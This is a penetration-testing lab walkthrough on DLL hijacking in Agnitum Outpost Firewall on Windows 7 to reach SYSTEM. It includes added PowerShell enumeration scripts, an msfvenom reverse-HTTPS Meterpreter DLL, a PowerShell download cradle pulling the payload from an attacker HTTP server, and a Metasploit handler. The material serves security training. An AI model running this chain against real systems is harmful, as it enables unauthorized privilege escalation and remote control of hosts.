© 2018 Caendra Inc. | Hera for PTPv5 | Post-Exploitation

The document describes conducting manual analysis on a Windows 7 system to identify a DLL hijacking vulnerability that can be exploited to escalate privileges. It provides credentials to log in as an administrator and low privileged user, and steps to use Process Monitor and Explorer to find a vulnerable application, generate a payload, and exploit the vulnerability to get a SYSTEM shell.


Your objective for this scenario is to conduct manual analysis using Process Monitor and
Process Explorer on a Windows 7 machine as a local administrator in order to discover an
application which may be vulnerable to DLL Hijacking.

Once the vulnerability has been identified as the administrator user, log onto the same
system as a low-privileged user and exploit the DLL Hijacking vulnerability to escalate
privileges to SYSTEM.

• Conduct manual research of a Windows 7 operating system and identify a DLL
Hijacking vulnerability that can lead to privilege escalation.
• Use the identified DLL Hijacking vulnerability to escalate your privileges to SYSTEM
from a low privileged user account.

• Process Explorer
• Process Monitor
• PowerShell
• Metasploit



Using the Administrator credentials below, Remote Desktop to the Windows 7 machine,
and conduct manual analysis of the system using Process Explorer and Process Monitor in
order to identify a DLL Hijacking Vulnerability that can lead to privilege escalation.

IP: 172.16.48.100

Username: student_admin

Password: s7udent_n1md@

Using the information obtained through manual analysis of the system as the administrator
user, use the Low Privileged user credentials below to remote desktop to the system,
exploit a DLL Hijacking vulnerability and escalate your privileges to SYSTEM.

IP: 172.16.48.100

Username: lowpriv

Password: c00l_passw0rd!

Below you can find solutions for each task of the Network Security, Post Exploitation –
DLL Hijacking lab. Remember, though, that you can follow your own strategy (which may
differ from the one explained below).

From our tester machine, a Kali Rolling install, we Remote Desktop to the lab system
as the administrator user:

Username: student_admin

Password: s7udent_n1md@

# rdesktop 172.16.48.100

Once connected, we launch Process Explorer from the shortcut on the Desktop: right-click
the shortcut and select “Run as Administrator.”

In Process Explorer we identify a process of interest running as NT AUTHORITY\SYSTEM,
“outpost.exe,” which a little research shows belongs to a third-party firewall
application (Agnitum Outpost Firewall).



Double-Clicking on the process, we take note of the directory where the application is
installed:



We also confirm that the process has an associated service, by navigating to the “Services”
tab for our “outpost.exe” process in question:



Viewing the permissions for the service, via the “Permissions” button on the same
Services tab, we also notice that the “Users” group has full control over the service:

Furthermore, if we inspect the permissions of the software’s program directory, we can
see that members of the “Users” group are able to modify the contents of this folder. We
take note of both facts, as they matter once we identify an opportunity for DLL
hijacking: a directory that standard users can write to, and that a SYSTEM process
searches for a DLL it cannot find, is exactly what a hijack needs.
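The same two checks done from PowerShell rather than the Process Explorer dialogs, as an added example that is not part of the original lab: the code reads the service account and image path from WMI, pulls the service DACL with `sc.exe sdshow` and decodes its SDDL ACEs, and lists which low-privileged principals may write to the image directory. The service name and directory are the lab’s; the function names, the set of rights treated as dangerous and the output layout are this example’s own choices. It assumes Windows PowerShell 3.0 to 5.1 (Get-WmiObject is not available in PowerShell 7).

```powershell
# Added example (not part of the Caendra lab): enumerate from PowerShell the
# two facts the walkthrough reads off the Process Explorer dialogs, namely who
# holds rights on the service object and who may write to its program
# directory. Assumes Windows PowerShell 3.0-5.1 and the built-in sc.exe.
# Service name and directory are the lab's; everything else is this example's.

# SDDL two-letter rights tokens as they apply to a service object.
$ServiceRights = @{
    'CC' = 'QUERY_CONFIG';  'DC' = 'CHANGE_CONFIG'; 'LC' = 'QUERY_STATUS'
    'SW' = 'ENUM_DEPS';     'RP' = 'START';         'WP' = 'STOP'
    'DT' = 'PAUSE';         'LO' = 'INTERROGATE';   'CR' = 'USER_CONTROL'
    'SD' = 'DELETE';        'RC' = 'READ_CONTROL';  'WD' = 'WRITE_DAC'
    'WO' = 'WRITE_OWNER';   'GA' = 'GENERIC_ALL';   'GW' = 'GENERIC_WRITE'
}
# Rights that let a principal reconfigure, restart or take over the service.
$DangerousTokens = 'DC', 'RP', 'WP', 'SD', 'WD', 'WO', 'GA', 'GW'
# Well-known SID aliases for "any user" principals (in the SID field WD = Everyone).
$LowPrivSids = @{ 'BU' = 'BUILTIN\Users'; 'AU' = 'Authenticated Users'
                  'WD' = 'Everyone';      'IU' = 'INTERACTIVE' }

function Get-ServiceSddlAces {
    param([Parameter(Mandatory)][string]$Name)
    # sc.exe sdshow prints an empty line followed by the SDDL string.
    $sddl = (& sc.exe sdshow $Name | Where-Object { $_ -match '\S' }) -join ''
    $dacl = ''
    if ($sddl -match 'D:(?<d>.*?)(?:S:|$)') { $dacl = $Matches['d'] }
    # Each ACE looks like (A;;CCLCSWRPWPDTLOCRRC;;;SY): type;flags;rights;;;sid
    $aceRx = '\((?<type>A|D);(?<flags>[^;]*);(?<rights>[^;]*);[^;]*;[^;]*;(?<sid>[^)]*)\)'
    foreach ($m in [regex]::Matches($dacl, $aceRx)) {
        $sid    = $m.Groups['sid'].Value
        $tokens = @([regex]::Matches($m.Groups['rights'].Value, '..') | ForEach-Object { $_.Value })
        $who    = $sid
        if ($LowPrivSids.ContainsKey($sid)) { $who = $LowPrivSids[$sid] }
        $names  = @($tokens | ForEach-Object { if ($ServiceRights.ContainsKey($_)) { $ServiceRights[$_] } else { $_ } })
        $type   = 'Deny'
        if ($m.Groups['type'].Value -eq 'A') { $type = 'Allow' }
        [pscustomobject]@{
            Type      = $type
            Principal = $who
            Rights    = ($names -join ',')
            Dangerous = [bool]@($tokens | Where-Object { $DangerousTokens -contains $_ }).Count
        }
    }
}

function Get-LowPrivWriteAces {
    param([Parameter(Mandatory)][string]$Path)
    $writeMask = [int][Security.AccessControl.FileSystemRights]'Write, Modify, FullControl'
    # Inherited ACEs sometimes carry raw generic bits instead of enum names:
    # GENERIC_ALL is 0x10000000 and GENERIC_WRITE is 0x40000000.
    $genericWrite = 0x50000000
    $anyUser = '^(BUILTIN\\Users|NT AUTHORITY\\Authenticated Users|Everyone|NT AUTHORITY\\INTERACTIVE)$'
    (Get-Acl -LiteralPath $Path).Access | Where-Object {
        $rights = [int]$_.FileSystemRights
        $_.AccessControlType -eq 'Allow' -and
        $_.IdentityReference.Value -match $anyUser -and
        (($rights -band $writeMask) -or ($rights -band $genericWrite))
    } | Select-Object IdentityReference, FileSystemRights, IsInherited
}

function Test-ServiceHijackSurface {
    param([Parameter(Mandatory)][string]$Name)
    $svc = Get-WmiObject Win32_Service -Filter "Name='$Name'"
    if (-not $svc) { throw "Service '$Name' not found" }
    # PathName may be quoted and carry arguments; keep only the image's directory.
    $exe = ($svc.PathName -split '\s+')[0]
    if ($svc.PathName -match '^"([^"]+)"') { $exe = $Matches[1] }
    $dir = Split-Path -Parent $exe
    $dirAces = @(Get-LowPrivWriteAces -Path $dir |
                 ForEach-Object { "$($_.IdentityReference) : $($_.FileSystemRights)" })
    $svcAces = @(Get-ServiceSddlAces -Name $svc.Name |
                 Where-Object { $_.Type -eq 'Allow' -and $_.Dangerous } |
                 ForEach-Object { "$($_.Principal) : $($_.Rights)" })
    [pscustomobject]@{
        Service          = $svc.Name
        RunsAs           = $svc.StartName
        StartMode        = $svc.StartMode
        Image            = $exe
        ImageDir         = $dir
        DirWritableBy    = $dirAces
        RiskyServiceAces = $svcAces
        Hijackable       = ($svc.StartName -eq 'LocalSystem' -and $dirAces.Count -gt 0)
    }
}

# The lab's service; on the lab host both DirWritableBy and RiskyServiceAces
# should come back populated for BUILTIN\Users.
Test-ServiceHijackSurface -Name OutpostFirewall | Format-List
```

Two things the output makes explicit that the screenshots only imply: if Users hold START and STOP on the service, a low-privileged account can restart it itself instead of rebooting the host, and if they hold CHANGE_CONFIG the service could be repointed at an arbitrary binary without any DLL at all. Either finding is worth recording separately from the hijack.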



Next, we launch Process Monitor as administrator, the same way we launched Process
Explorer.

In Process Monitor we modify the current filter by clicking the filter button in the
toolbar, or by pressing Ctrl+L, which opens the Process Monitor Filter dialog:



From here, we select “Process Name” from the first drop-down:



We then enter “outpost.exe” in the text field, and click on the “Add” button:

We also add a filter for the “Result” column, and supply a value of “NAME NOT FOUND” in
the text field:



We can refine the filter further by adding a condition where “Path” contains the string
“dll”. This narrows the view to DLLs the application tries to load:

We click “Add,” and then “OK” to apply our selections.

The Process Monitor window may be empty at this point: the filter only matches failed
DLL lookups by outpost.exe, and none have been captured yet.

Next, we kill the “outpost.exe” process that runs with NT AUTHORITY\SYSTEM privileges.
We can do this from Process Explorer by right-clicking the process and selecting “Kill
Process,” making sure to pick the outpost.exe instance that is running as SYSTEM and not
another instance of the same name.



We then need to start the OutpostFirewall service. This, we do from an administrator
command prompt. From the start menu, type “cmd,” right click on “Cmd” and select “Run
As Administrator.”



Then start the OutpostFirewall service again with the following command:

C:\windows\system32\> net start OutpostFirewall

As the service starts, Process Monitor captures events that are useful for the purpose
of DLL hijacking: the loader probes the service’s own directory for DLLs that are not there:



Important: make sure the DLL we choose to hijack is one searched for by the process
running with NT AUTHORITY\SYSTEM privileges, as seen above (another outpost.exe instance
may run in the context of the logged-on user, and a DLL loaded by that one would only
execute with that user’s privileges). In the screenshot we can see two candidates,
“UxTheme.dll” and “imageres.dll.” Both are legitimate Windows DLLs that live in
System32; they show up as NAME NOT FOUND in the application directory because that
directory is the first location in the default DLL search order, and neither is on the
KnownDLLs list that would let the loader skip the search.

For this example we choose “UxTheme.dll” as the candidate for our DLL hijack.

At this point we have identified that the service looks for several DLLs in a directory
we can write to as a low-privileged member of the “Users” group.

Our next step is to log in to the system as the low-privileged user, plant our chosen DLL
(UxTheme.dll), and ultimately get a SYSTEM shell on the target.
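Once a capture like the one above has been saved (File > Save, CSV format, with the optional “User” column enabled under Options > Select Columns), the candidate list can be produced without scrolling through the GUI. The following PowerShell is an added example and not part of the original lab: it applies the same three conditions as the Procmon filter built above (process name, NAME NOT FOUND, path ending in .dll), ranks the DLLs the SYSTEM instance probed for first, and optionally checks whether the current user can really write to each directory by creating and deleting a file there. The CSV rows are constructed to resemble the lab’s events; the column names are Process Monitor’s defaults plus “User”, and the function names are this example’s own. Assumes Windows PowerShell 3.0 or later.

```powershell
# Added example, not part of the Caendra lab: reduce a Process Monitor CSV
# export to a ranked list of DLL hijack candidates. Column names are Process
# Monitor's defaults plus the optional "User" column (Options > Select Columns
# before saving). The rows below are constructed to resemble the lab's events.
# Assumes Windows PowerShell 3.0 or later.

$SampleCsv = @'
"Time of Day","Process Name","PID","Operation","Path","Result","Detail","User"
"10:01:02.1","outpost.exe","1234","CreateFile","C:\Program Files (x86)\Agnitum\Outpost Firewall 1.0\UxTheme.dll","NAME NOT FOUND","Desired Access: Read Attributes","NT AUTHORITY\SYSTEM"
"10:01:02.2","outpost.exe","1234","CreateFile","C:\Windows\System32\UxTheme.dll","SUCCESS","Desired Access: Read Attributes","NT AUTHORITY\SYSTEM"
"10:01:02.3","outpost.exe","1234","CreateFile","C:\Program Files (x86)\Agnitum\Outpost Firewall 1.0\imageres.dll","NAME NOT FOUND","Desired Access: Read Attributes","NT AUTHORITY\SYSTEM"
"10:01:05.0","outpost.exe","2345","CreateFile","C:\Program Files (x86)\Agnitum\Outpost Firewall 1.0\other.dll","NAME NOT FOUND","Desired Access: Read Attributes","WIN7\lowpriv"
"10:01:05.1","svchost.exe","600","CreateFile","C:\Windows\System32\missing.dll","NAME NOT FOUND","Desired Access: Read Attributes","NT AUTHORITY\SYSTEM"
'@

function Test-DirectoryWritable {
    # Probe by creating and deleting a file: this reflects the effective rights
    # of the account running the script (lowpriv), which is what matters when
    # planting the DLL, and sidesteps ACL-interpretation mistakes.
    param([Parameter(Mandatory)][string]$Directory)
    if (-not (Test-Path -LiteralPath $Directory -PathType Container)) { return $false }
    $probe = Join-Path $Directory ('~' + [guid]::NewGuid().ToString('N') + '.tmp')
    try {
        [IO.File]::WriteAllText($probe, '')
        Remove-Item -LiteralPath $probe -Force
        return $true
    } catch {
        return $false
    }
}

function Get-DllHijackCandidates {
    param(
        [Parameter(Mandatory)][string]$CsvText,
        [string]$ProcessName = 'outpost.exe',
        [string]$WantedUser  = 'NT AUTHORITY\SYSTEM',
        [switch]$ProbeWrite
    )
    $rows = ($CsvText -split "`r?`n") | ConvertFrom-Csv
    # Same three conditions as the Procmon filter built in the walkthrough.
    $misses = $rows | Where-Object {
        $_.'Process Name' -eq $ProcessName -and
        $_.Operation -eq 'CreateFile' -and
        $_.Result -eq 'NAME NOT FOUND' -and
        $_.Path -match '\.dll$'
    }
    $misses | Group-Object Path | ForEach-Object {
        $first = $_.Group[0]
        $dir   = Split-Path -Parent $first.Path
        $writable = $null
        if ($ProbeWrite) { $writable = Test-DirectoryWritable -Directory $dir }
        [pscustomobject]@{
            Dll       = Split-Path -Leaf $first.Path
            Directory = $dir
            Process   = "$($first.'Process Name') ($($first.PID))"
            User      = $first.User
            AsSystem  = ($first.User -eq $WantedUser)
            Writable  = $writable
            Hits      = $_.Count
        }
    } | Sort-Object -Property @{ Expression = 'AsSystem'; Descending = $true }, Dll
}

# Offline run on the constructed sample: imageres.dll and UxTheme.dll rank
# first (probed by the SYSTEM instance); other.dll is listed with AsSystem=False,
# and the svchost.exe row is dropped by the process-name condition.
Get-DllHijackCandidates -CsvText $SampleCsv | Format-Table -AutoSize

# On the target, as lowpriv, against a real export saved from Procmon:
# Get-DllHijackCandidates -CsvText (Get-Content .\Logfile.CSV -Raw) -ProbeWrite
```

Run the `-ProbeWrite` form from the lowpriv session, not the administrator one; the probe answers the question that matters (“can this account drop a file here?”) for whoever runs it.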

Having analysed the application and identified it as vulnerable to DLL hijacking, we
next log in to the system as our low-privileged user and continue with the task.

Username: lowpriv

Password: c00l_passw0rd!

# rdesktop 172.16.48.100

The first thing we need is the payload that will become our “malicious” UxTheme.dll.

On our attacker machine we use msfvenom to generate a 32-bit Meterpreter reverse_https
DLL payload (outpost.exe is a 32-bit application, so a 64-bit DLL would never be loaded
into it). LHOST must be the address the handler will listen on (172.16.48.10 in the
handler configured further below):

# msfvenom -p windows/meterpreter/reverse_https LHOST=<attacker IP> LPORT=4444 -f dll > UxTheme.dll

We need a way to get the payload onto the target, so on the attacker machine we serve
the directory that contains the malicious DLL with Python’s built-in HTTP server on
port 80 (on current Kali releases, where python is Python 3, the equivalent module is
http.server):

# python -m SimpleHTTPServer 80
Serving HTTP on 0.0.0.0 port 80 ...

Then, from the target system, we open a command prompt and run a PowerShell download
cradle that writes the payload into the application directory (the file is only written
to disk here; nothing is executed until the service loads it):

C:\Users\lowpriv> powershell -c "(New-Object Net.WebClient).DownloadFile('http://<attacker_IP>/UxTheme.dll', 'C:\Program Files (x86)\Agnitum\Outpost Firewall 1.0\UxTheme.dll')"

We can then confirm the DLL has landed in the application’s program directory:

C:\users\lowpriv> dir "C:\Program Files (x86)\Agnitum\Outpost Firewall 1.0\UxTheme.dll"
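Beyond `dir`, two things are worth checking before rebooting: that the file on the target is byte-for-byte the one msfvenom produced, and that its bitness matches outpost.exe. The following PowerShell is an added example rather than lab code: it reads the PE header of both files and compares them, and hashes the DLL so the value can be checked against `sha256sum UxTheme.dll` on the attacker box. It assumes outpost.exe sits in the same directory as the planted DLL (the lab shows the directory but not the image path explicitly) and Windows PowerShell 3.0 or later.

```powershell
# Added example, not lab code: confirm the planted DLL is the file msfvenom
# produced and that its bitness matches the process that will load it. The
# msfvenom windows/ payloads are 32-bit; an x64 DLL dropped for a 32-bit
# outpost.exe would never be loaded. Assumes outpost.exe sits in the same
# directory as the planted DLL and Windows PowerShell 3.0 or later.

function Get-PeMachine {
    # Reads IMAGE_FILE_HEADER.Machine straight from the file: MZ header,
    # e_lfanew at offset 0x3C, 'PE\0\0' signature, then the 16-bit Machine field.
    param([Parameter(Mandatory)][string]$Path)
    $fs = [IO.File]::OpenRead($Path)
    try {
        $br = New-Object IO.BinaryReader($fs)
        if ($br.ReadUInt16() -ne 0x5A4D) { throw "$Path has no MZ header" }
        $null = $fs.Seek(0x3C, 'Begin')
        $peOffset = $br.ReadUInt32()
        $null = $fs.Seek($peOffset, 'Begin')
        if ($br.ReadUInt32() -ne 0x00004550) { throw "$Path has no PE signature" }
        $machine = $br.ReadUInt16()
        switch ($machine) {
            0x014C  { 'x86' }
            0x8664  { 'x64' }
            default { 'unknown 0x{0:X4}' -f $machine }
        }
    } finally {
        $fs.Close()
    }
}

function Get-Sha256Hex {
    # Manual hashing rather than Get-FileHash so it also runs on PowerShell 3.
    param([Parameter(Mandatory)][string]$Path)
    $sha = [Security.Cryptography.SHA256]::Create()
    ([BitConverter]::ToString($sha.ComputeHash([IO.File]::ReadAllBytes($Path)))) -replace '-', ''
}

function Test-PlantedDll {
    param(
        [Parameter(Mandatory)][string]$DllPath,
        [Parameter(Mandatory)][string]$HostExe,
        [string]$ExpectedSha256     # output of `sha256sum UxTheme.dll` on Kali
    )
    if (-not (Test-Path -LiteralPath $DllPath)) { throw "missing: $DllPath" }
    $dllArch = Get-PeMachine -Path $DllPath
    $exeArch = Get-PeMachine -Path $HostExe
    $hash    = Get-Sha256Hex -Path $DllPath
    $hashOk  = $null
    if ($ExpectedSha256) { $hashOk = ($hash -eq $ExpectedSha256.ToUpper()) }
    [pscustomobject]@{
        Dll       = $DllPath
        DllArch   = $dllArch
        HostArch  = $exeArch
        ArchMatch = ($dllArch -eq $exeArch)
        Sha256    = $hash
        HashMatch = $hashOk
    }
}

# Offline sanity check on any 64-bit Windows host: the two notepad.exe copies
# report x64 and x86 respectively.
Get-PeMachine "$env:windir\System32\notepad.exe"
Get-PeMachine "$env:windir\SysWOW64\notepad.exe"

# On the lab target as lowpriv; add -ExpectedSha256 <hash from kali> to get HashMatch.
$dir = 'C:\Program Files (x86)\Agnitum\Outpost Firewall 1.0'
if (Test-Path -LiteralPath "$dir\UxTheme.dll") {
    Test-PlantedDll -DllPath "$dir\UxTheme.dll" -HostExe "$dir\outpost.exe" | Format-List
}
```

ArchMatch must be True before the reboot; if it is not, regenerate the payload with the matching msfvenom platform and architecture rather than rebooting and waiting for a session that cannot arrive.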

Now that our rogue DLL is in place, we prepare a listener on the attacker machine to
handle the connection once the Outpost Firewall service restarts on the target:

msf > use exploit/multi/handler
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_https
msf exploit(multi/handler) > set LHOST 172.16.48.10
msf exploit(multi/handler) > set LPORT 4444
msf exploit(multi/handler) > exploit -j
[*] Exploit running as background job 0.
[*] Started HTTPS reverse handler on https://172.16.48.10:4444

With the handler ready, we need to restart the machine so that when the service starts it
loads our rogue UxTheme.dll, giving us a Meterpreter session from the target as SYSTEM.
(Since the “Users” group holds full control over the service, stopping and starting the
service from the lowpriv session is an alternative to a reboot whenever the firewall
service lets itself be stopped.) Because the payload runs inside the service process,
migrate to another SYSTEM process soon after the session arrives, before outpost.exe
exits or misbehaves for lack of its real UxTheme.dll.



We can reboot the system from the Remote Desktop session with the following command
from a command prompt:

C:\Users\lowpriv> shutdown /r /t 0

When the system comes back, it may take several minutes with this particular
application for the system to fully start and for all the necessary services to come up,
but we should end up with a SYSTEM-level Meterpreter session after some time:
